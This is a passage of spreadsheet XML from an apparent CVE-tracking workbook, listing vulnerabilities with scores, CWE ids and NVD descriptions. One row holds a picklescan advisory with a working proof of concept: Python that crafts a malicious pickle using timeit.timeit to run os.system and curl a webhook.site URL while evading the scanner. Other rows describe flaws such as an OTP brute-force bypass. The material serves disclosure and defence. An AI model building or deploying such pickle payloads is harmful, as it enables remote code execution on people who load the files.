          <t>CVE-2026-75722</t>
        </is>
      </c>
      <c r="D790" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E790" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F790" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G790" s="5" t="inlineStr"/>
      <c r="H790" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I790" s="5" t="inlineStr"/>
      <c r="J790" s="5" t="inlineStr"/>
      <c r="K790" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="L790" s="5" t="inlineStr"/>
      <c r="M790" s="5" t="inlineStr"/>
      <c r="N790" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O790" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P790" s="5" t="inlineStr"/>
      <c r="Q790" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R790" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="S790" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75722</t>
        </is>
      </c>
    </row>
    <row r="791">
      <c r="A791" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B791" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C791" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75729</t>
        </is>
      </c>
      <c r="D791" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E791" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F791" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G791" s="5" t="inlineStr"/>
      <c r="H791" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I791" s="5" t="inlineStr"/>
      <c r="J791" s="5" t="inlineStr"/>
      <c r="K791" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="L791" s="5" t="inlineStr"/>
      <c r="M791" s="5" t="inlineStr"/>
      <c r="N791" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O791" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P791" s="5" t="inlineStr"/>
      <c r="Q791" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R791"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91" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75729</t>
        </is>
      </c>
    </row>
    <row r="792">
      <c r="A792" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B792" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C792" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75733</t>
        </is>
      </c>
      <c r="D792" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E792" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F792" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G792" s="5" t="inlineStr"/>
      <c r="H792" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I792" s="5" t="inlineStr"/>
      <c r="J792" s="5" t="inlineStr"/>
      <c r="K792" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="L792" s="5" t="inlineStr"/>
      <c r="M792" s="5" t="inlineStr"/>
      <c r="N792" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O792" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P792" s="5" t="inlineStr"/>
      <c r="Q792" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R792"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92" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75733</t>
        </is>
      </c>
    </row>
    <row r="793">
      <c r="A793" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B793" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C793" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75735</t>
        </is>
      </c>
      <c r="D793" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E793" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F793" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G793" s="5" t="inlineStr"/>
      <c r="H793" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I793" s="5" t="inlineStr"/>
      <c r="J793" s="5" t="inlineStr"/>
      <c r="K793" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="L793" s="5" t="inlineStr"/>
      <c r="M793" s="5" t="inlineStr"/>
      <c r="N793" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O793" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P793" s="5" t="inlineStr"/>
      <c r="Q793" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R793"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93" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75735</t>
        </is>
      </c>
    </row>
    <row r="794">
      <c r="A794" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B794" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C794" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75738</t>
        </is>
      </c>
      <c r="D794" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E794" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F794" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G794" s="5" t="inlineStr"/>
      <c r="H794" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I794" s="5" t="inlineStr"/>
      <c r="J794" s="5" t="inlineStr"/>
      <c r="K794" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="L794" s="5" t="inlineStr"/>
      <c r="M794" s="5" t="inlineStr"/>
      <c r="N794" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O794" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P794" s="5" t="inlineStr"/>
      <c r="Q794" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R794"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94" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75738</t>
        </is>
      </c>
    </row>
    <row r="795">
      <c r="A795" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B795" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C795" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75740</t>
        </is>
      </c>
      <c r="D795" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E795" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F795" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G795" s="5" t="inlineStr"/>
      <c r="H795" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I795" s="5" t="inlineStr"/>
      <c r="J795" s="5" t="inlineStr"/>
      <c r="K795" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="L795" s="5" t="inlineStr"/>
      <c r="M795" s="5" t="inlineStr"/>
      <c r="N795" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O795" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P795" s="5" t="inlineStr"/>
      <c r="Q795" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R795"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795" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75740</t>
        </is>
      </c>
    </row>
    <row r="796">
      <c r="A796" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B796" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C796" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-71351</t>
        </is>
      </c>
      <c r="D796" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E796" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F796" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G796" s="5" t="inlineStr"/>
      <c r="H796" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I796" s="5" t="inlineStr"/>
      <c r="J796" s="5" t="inlineStr"/>
      <c r="K796" s="5" t="inlineStr"/>
      <c r="L796" s="5" t="inlineStr">
        <is>
          <t>pip:picklescan</t>
        </is>
      </c>
      <c r="M796" s="5" t="inlineStr">
        <is>
          <t>0.0.25</t>
        </is>
      </c>
      <c r="N796" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O796" s="5" t="inlineStr"/>
      <c r="P796" s="5" t="inlineStr"/>
      <c r="Q796" s="5" t="inlineStr">
        <is>
          <t>CWE-184</t>
        </is>
      </c>
      <c r="R796" s="5" t="inlineStr">
        <is>
          <t>### Summary
Using timeit.timeit() function, which is a built-in python library function to execute remote pickle file.
### Details
Pickle’s deserialization process is known to allow execution of function via reduce method. While Picklescan is meant to detect such exploits, this attack evades detection by calling built-in python library function like **timeit.timeit()**. And since timeit library wasn't inside unsafe globals blacklist, it may not raise red flag in the security scan.
The attack payload executes in the following steps:
First, the attacker craft the payload by calling to **timeit.timeit()** function from timeit library in __reduce__ method
Then, inside reduce method, the attacker import dangerous libarary like os and calling **os.system()** to run OS commands, for example: curl command. And then the attacker send this malicious pickle file to the victim.
Then when the victim after checking whether the pickle file is safe by using Picklescan library and this library doesn't dectect any dangerous functions, decide to pickle.load() this malicious pickle file, thus lead to remote code execution.
### PoC
1. The attacker crafted a malicious pickle file using built-in python library function timeit.timeit()
```
import pickle
import timeit
class Payload(object):
    def __reduce__(self):
        return timeit.timeit, ('','import os; os.system("curl https://webhook.site/95f3e1c3-ee37-4a5a-8544-ab4ce93475f6")')
def create_payload():
  with open('payload.pickle', 'wb') as f:
    pickle.dump(Payload(), f)
create_payload()
```
Then the attacker will send this pickle file to the victim computer and maybe the victim load this pickle using pickle.load()
2. The victim will use picklescan library to check out if the received pickle file is malicious or not
```
picklescan -p payload.pickle
----------- SCAN SUMMARY -----------
Scanned files: 1
Infected files: 0
Dangerous globals: 0
```
3. Beliving that this pickle file is safe using modelscan, the victim then load this pickle file which will trigger timeit.timeit command to execute OS commands (in my example, it was curl command)
```
import pickle
def load_payload():
    with open('payload.pickle', 'rb') as f:
      pickle.load(f)
load_payload()
```
### Impact
Severity: High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Recommended Solution
I suggest adding timeit library to the unsafe globals blacklist.</t>
        </is>
      </c>
      <c r="S796" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-71351</t>
        </is>
      </c>
    </row>
    <row r="797">
      <c r="A797" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B797" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C797" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-11446</t>
        </is>
      </c>
      <c r="D797" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E797" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F797" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G797" s="5" t="inlineStr"/>
      <c r="H797" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I797" s="5" t="inlineStr"/>
      <c r="J797" s="5" t="inlineStr"/>
      <c r="K797" s="5" t="inlineStr"/>
      <c r="L797" s="5" t="inlineStr"/>
      <c r="M797" s="5" t="inlineStr"/>
      <c r="N797" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O797" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P797" s="5" t="inlineStr"/>
      <c r="Q797" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R797" s="5" t="inlineStr">
        <is>
          <t>The Booktics – Booking Calendar for Appointments and Service Businesses plugin for WordPress is vulnerable to unauthorized modification of data in all versions up to, and including, 1.0.23. This is due to the create_order_permission() permission callback on the POST /wp-json/booktics/v1/orders REST route unconditionally returning true, combined with find_and_update_guest() overwriting an existing customer record's stored name, phone, and wp_user_id whenever the caller-supplied email matches, with no proof of ownership. This makes it possible for unauthenticated attackers to overwrite the contact details (name and phone) of any existing customer whose email address they know, poisoning downstream reminder emails, SMS, calendar invites, and CRM data.</t>
        </is>
      </c>
      <c r="S797" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-11446</t>
        </is>
      </c>
    </row>
    <row r="798">
      <c r="A798" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B798" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C798" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12215</t>
        </is>
      </c>
      <c r="D798" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E798" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F798" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G798" s="5" t="inlineStr"/>
      <c r="H798" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I798" s="5" t="inlineStr"/>
      <c r="J798" s="5" t="inlineStr"/>
      <c r="K798" s="5" t="inlineStr"/>
      <c r="L798" s="5" t="inlineStr"/>
      <c r="M798" s="5" t="inlineStr"/>
      <c r="N798" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O798" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P798" s="5" t="inlineStr"/>
      <c r="Q798" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="R798" s="5" t="inlineStr">
        <is>
          <t>The OTP Login &amp; Register Woocommerce plugin for WordPress is vulnerable to Authentication Bypass via OTP Brute Force in all versions up to, and including, 2.7.2. The vulnerability exists because the OTP rate-limit attempt counter in `process_otp_form` is keyed exclusively on the attacker-controlled `xoo_ml_user_ip_data` cookie's `ip_address` field, allowing unlimited counter resets by simply rotating the cookie, while the OTP itself is generated with PHP's non-cryptographic `rand()` function over a default space of only 9,000 possible values (1000–9999), and both the OTP issuance endpoint (`xoo_ml_login_with_otp`) and verification endpoint (`xoo_ml_otp_form_submit`) are registered as unauthenticated `wp_ajax_nopriv` actions with no nonce or capability checks. This makes it possible for unauthenticated attackers to brute-force the OTP for any registered account and obtain a full WordPress authentication session — including for administrator accounts — via `wp_set_auth_cookie()` in `login_user_with_otp()`. Exploitation requires the attacker to know the target user's registered phone number, which is used to trigger OTP issuance via the unauthenticated `xoo_ml_login_with_otp` endpoint.</t>
        </is>
      </c>
      <c r="S798" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12215</t>
        </is>
      </c>
    </row>
    <row r="799">
      <c r="A799" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B799" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C799" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-14562</t>
        </is>
      </c>
      <c r="D799" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E799" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F799" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G799" s="5" t="inlineStr"/>
      <c r="H799" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I799" s="5" t="inlineStr"/>
      <c r="J799" s="5" t="inlineStr"/>
      <c r="K799" s="5" t="inlineStr"/>
      <c r="L799" s="5" t="inlineStr"/>
      <c r="M799" s="5" t="inlineStr"/>
      <c r="N799" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O799" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P799" s="5" t="inlineStr"/>
      <c r="Q799" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="R799" s="5" t="inlineStr">
        <is>
          <t>The teddy-bear-customize-addon WordPress plugin through 1.0.5 does not perform any authorization or ownership checks before returning WooCommerce order metadata and the URLs of customer-uploaded attachments, allowing unauthenticated attackers to disclose other customers' order and attachment data.</t>
        </is>
      </c>
      <c r="S799" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-14562</t>
        </is>
      </c>
    </row>
    <row r="800">
      <c r="A800" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B800" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C800" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-21092</t>
        </is>
      </c>
      <c r="D800" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E800" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F800" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G800" s="5" t="inlineStr"/>
      <c r="H800" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I800" s="5" t="inlineStr"/>
      <c r="J800" s="5" t="inlineStr"/>
      <c r="K800" s="5" t="inlineStr">
        <is>
          <t>samsung:android</t>
        </is>
      </c>
      <c r="L800" s="5" t="inlineStr"/>
      <c r="M800" s="5" t="inlineStr"/>
      <c r="N800" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O800" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P800" s="5" t="inlineStr"/>
      <c r="Q800" s="5" t="inlineStr">
        <is>
          <t>CWE-35</t>
        </is>
      </c>
      <c r="R800" s="5" t="inlineStr">
        <is>
          <t>Path traversal in ImsService prior to SMR Sep-2026 Release 1 allows remote attackers to create image files with system server privilege.</t>
        </is>
      </c>
      <c r="S800" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-21092</t>
        </is>
      </c>
    </row>
    <row r="801">
      <c r="A801" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B801" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C801" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-27378</t>
        </is>
      </c>
      <c r="D801" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E801" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F801" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G801" s="5" t="inlineStr"/>
      <c r="H801" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I801" s="5" t="inlineStr"/>
      <c r="J801" s="5" t="inlineStr"/>
      <c r="K801" s="5" t="inlineStr"/>
      <c r="L801" s="5" t="inlineStr"/>
      <c r="M801" s="5" t="inlineStr"/>
      <c r="N801" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O801" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P801" s="5" t="inlineStr"/>
      <c r="Q801" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R801" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Broken Access Control in Deposits and Partial Payments for WooCommerce &lt;= 3.1.0 versions.</t>
        </is>
      </c>
      <c r="S801" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-27378</t>
        </is>
      </c>
    </row>
    <row r="802">
      <c r="A802" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B802" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C802" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49462</t>
        </is>
      </c>
      <c r="D802" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E802" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F802" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G802" s="5" t="inlineStr"/>
      <c r="H802" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I802" s="5" t="inlineStr"/>
      <c r="J802" s="5" t="inlineStr"/>
      <c r="K802" s="5" t="inlineStr"/>
      <c r="L802" s="5" t="inlineStr"/>
      <c r="M802" s="5" t="inlineStr"/>
      <c r="N802" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O802" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P802" s="5" t="inlineStr"/>
      <c r="Q802" s="5" t="inlineStr">
        <is>
          <t>CWE-1188, CWE-200</t>
        </is>
      </c>
      <c r="R802" s="5" t="inlineStr">
        <is>
          <t>NL Portal Backend Libraries provide backend components for Dutch government portals that interact with residents, customers, suppliers, and partner organizations. In versions up to and including 3.0.0, deployments using the shipped default configuration exposed two GraphQL developer features without requiring authentication: the GraphiQL playground, an interactive UI for issuing GraphQL queries; and schema introspection, which lets a caller download the full description of every query, mutation, type, and argument the API supports. Anyone who could reach the `/graphiql` endpoint could open the playground in a browser, pull the full schema, and use that to map out the API and craft calls against it. By itself this does not leak user data, but it removes the guesswork from attacking the rest of the API and significantly lowers the bar for finding and exploiting other weaknesses. Version 3.0.1 patches the issue. As a workaround, override the two settings in deployed configuration.</t>
        </is>
      </c>
      <c r="S802" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49462</t>
        </is>
      </c>
    </row>
    <row r="803">
      <c r="A803" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B803" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C803" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49865</t>
        </is>
      </c>
      <c r="D803" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E803" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F803" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G803" s="5" t="inlineStr"/>
      <c r="H803" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I803" s="5" t="inlineStr"/>
      <c r="J803" s="5" t="inlineStr"/>
      <c r="K803" s="5" t="inlineStr"/>
      <c r="L803" s="5" t="inlineStr"/>
      <c r="M803" s="5" t="inlineStr"/>
      <c r="N803" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O803" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P803" s="5" t="inlineStr"/>
      <c r="Q803" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R803" s="5" t="inlineStr">
        <is>
          <t>Kimai is an open-source time tracking application. Versions prior to 2.58.0 contain a server-side request forgery vulnerability in their invoice PDF preview and generation workflow. If an attacker can control Markdown content that is later rendered into an invoice PDF, such as `Customer.invoiceText`, the server-side PDF renderer will fetch remote image URLs embedded in Markdown image syntax. This allows the application server to issue outbound requests to attacker-controlled or internal targets during PDF rendering. The behavior can be used for internal network probing, server-side reachability checks, and potentially follow-on exploitation depending on deployment environment and accessible internal services. Version 2.58.0 patches the issue.</t>
        </is>
      </c>
      <c r="S803" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49865</t>
        </is>
      </c>
    </row>
    <row r="804">
      <c r="A804" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B804" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C804" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57160</t>
        </is>
      </c>
      <c r="D804" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E804" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F804" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G804" s="5" t="inlineStr"/>
      <c r="H804" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I804" s="5" t="inlineStr"/>
      <c r="J804" s="5" t="inlineStr"/>
      <c r="K804" s="5" t="inlineStr">
        <is>
          <t>teluu:pjsip</t>
        </is>
      </c>
      <c r="L804" s="5" t="inlineStr"/>
      <c r="M804" s="5" t="inlineStr"/>
      <c r="N804" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O804" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P804" s="5" t="inlineStr"/>
      <c r="Q804" s="5" t="inlineStr">
        <is>
          <t>CWE-193</t>
        </is>
      </c>
      <c r="R804" s="5" t="inlineStr">
        <is>
          <t>PJSIP is a free and open source multimedia communication library written in C. Prior to commit d6a0e7f, a buffer overflow can occur in pjsip_generic_array_hdr_print() in pjsip/src/pjsip/sip_msg.c, the function that serializes generic array headers (such as Allow, Require, Supported, and Unsupported). Under certain output-buffer boundary conditions the function can write one byte past the end of the buffer. This is reachable mainly in applications that parse and re-serialize incoming SIP requests — for example a proxy, SBC, or B2BUA — where a remote peer can influence the serialized message. The out-of-bounds write is a single fixed byte; code execution and information disclosure are not demonstrated, and in typical pool-based allocations the byte falls within allocation slack. This issue has been patched via commit d6a0e7f.</t>
        </is>
      </c>
      <c r="S804" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57160</t>
        </is>
      </c>
    </row>
    <row r="805">
      <c r="A805" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B805" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C805" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57165</t>
        </is>
      </c>
      <c r="D805" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E805" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F805" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G805" s="5" t="inlineStr"/>
      <c r="H805" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I805" s="5" t="inlineStr"/>
      <c r="J805" s="5" t="inlineStr"/>
      <c r="K805" s="5" t="inlineStr">
        <is>
          <t>teluu:pjsip</t>
        </is>
      </c>
      <c r="L805" s="5" t="inlineStr"/>
      <c r="M805" s="5" t="inlineStr"/>
      <c r="N805" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O805" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P805" s="5" t="inlineStr"/>
      <c r="Q805" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="R805" s="5" t="inlineStr">
        <is>
          <t>PJSIP is a free and open source multimedia communication library written in C. Prior to commit 628b716, a stack buffer overflow exists in the PJLIB-UTIL telnet CLI front-end when redrawing the command line during history recall (handle_up_down() in cli_telnet.c). This affects only applications that enable the telnet CLI front-end (same gating as the related CLI issue). The line-redraw sequence for a recalled history entry can accumulate more data than a fixed-size stack buffer holds, which may lead to application termination. Exploitation requires access to the unauthenticated telnet CLI, which already permits arbitrary CLI commands, so the additional impact is limited. Applications that do not enable the telnet CLI front-end are not affected. This issue has been patched via commit 628b716.</t>
        </is>
      </c>
      <c r="S805" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57165</t>
        </is>
      </c>
    </row>
    <row r="806">
      <c r="A806" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B806" s="5" t="inlineStr">
        <is>
